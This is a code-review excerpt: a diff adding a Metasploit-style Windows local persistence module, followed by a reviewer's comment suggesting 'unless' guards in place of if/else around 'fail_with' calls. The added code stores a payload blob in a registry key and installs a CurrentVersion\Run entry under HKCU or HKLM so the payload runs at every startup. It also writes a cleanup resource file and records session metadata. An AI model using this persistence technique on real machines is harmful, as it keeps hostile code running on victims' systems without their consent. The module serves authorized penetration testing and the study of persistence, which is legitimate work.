modules/exploits/windows/local/registry_persistence.rb

```diff
@@ -0,0 +1,192 @@
+                fail_with(Failure::Unknown,"Failed to create key #{blob_reg_key}")
+            end
+        end
+
+        if registry_setvaldata(blob_reg_key, blob_reg_name, blob, "REG_SZ")
+            print_good("Installed payload blob to #{blob_reg_key}\\#{blob_reg_name}")
+        else
+            fail_with(Failure::Unknown,'Failed to open the registry key for writing')
+        end
+
+    end
+
+    def install_cmd(cmd, cmd_reg, root_path)
+        if registry_setvaldata("#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", cmd_reg, cmd, 'REG_EXPAND_SZ')
+            print_good("Installed run key #{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{cmd_reg}")
+        else
+            fail_with(Failure::Unknown,'Could not install run key')
+        end
+    end
+
+    def get_root_path
+        if datastore["STARTUP"] == 'USER'
+            root_path = 'HKCU'
+        else
+            root_path = 'HKLM'
+        end
+        return root_path
+    end
+
+    def log_file(log_path = nil) # Thanks Meatballs for this
+        # Get hostname
+        host = session.session_host
+
+        # Create Filename info to be appended to downloaded files
+        filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+        # Create a directory for the logs
+        if log_path
+          logs = ::File.join(log_path, 'logs', 'persistence',
+                             Rex::FileUtils.clean_path(host + filenameinfo))
+        else
+          logs = ::File.join(Msf::Config.log_directory, 'persistence',
+                             Rex::FileUtils.clean_path(host + filenameinfo))
+        end
+
+        # Create the log directory
+        ::FileUtils.mkdir_p(logs)
+
+        # logfile name
+        logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
+        logfile
+    end
+
+    def create_cleanup(root_path, blob_reg_key, cmd_reg) # Thanks Meatballs for this
+        clean_rc = log_file()
+        @clean_up_rc = ""
+        @clean_up_rc << "reg deletekey -k '#{root_path}\\#{blob_reg_key}'\n"
+        @clean_up_rc << "reg deleteval -k '#{root_path}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -v '#{cmd_reg}'\n"
+        file_local_write(clean_rc, @clean_up_rc)
+        print_status("Clean up Meterpreter RC file: #{clean_rc}")
+
+        report_note(:host => session.session_host,
+          :type => "host.persistance.cleanup",
+          :data => {
+            :local_id    => session.sid,
+            :stype       => session.type,
+            :desc        => session.info,
+            :platform    => session.platform,
+            :via_payload => session.via_payload,
+            :via_exploit => session.via_exploit,
+            :created_at  => Time.now.utc,
+            :commands    => @clean_up_rc
+          }
+        )
+    end
+
+    def exploit
+        print_status('Generating payload blob..')
+        blob = generate_payload_blob
+        if blob.length <= 16383
```

Comment:
Your `if` checks with a `fail_with` calls (you have a few of them) can be inverted to reduce code size and remove the `else` condition. For example:
``` ruby
unless blob.length <= 16383
  fail_with(Failure::Unknown, "Payload blob is too large (#{blob.length} bytes)")
end

print_good("Generated payload, #{blob.length} bytes")
```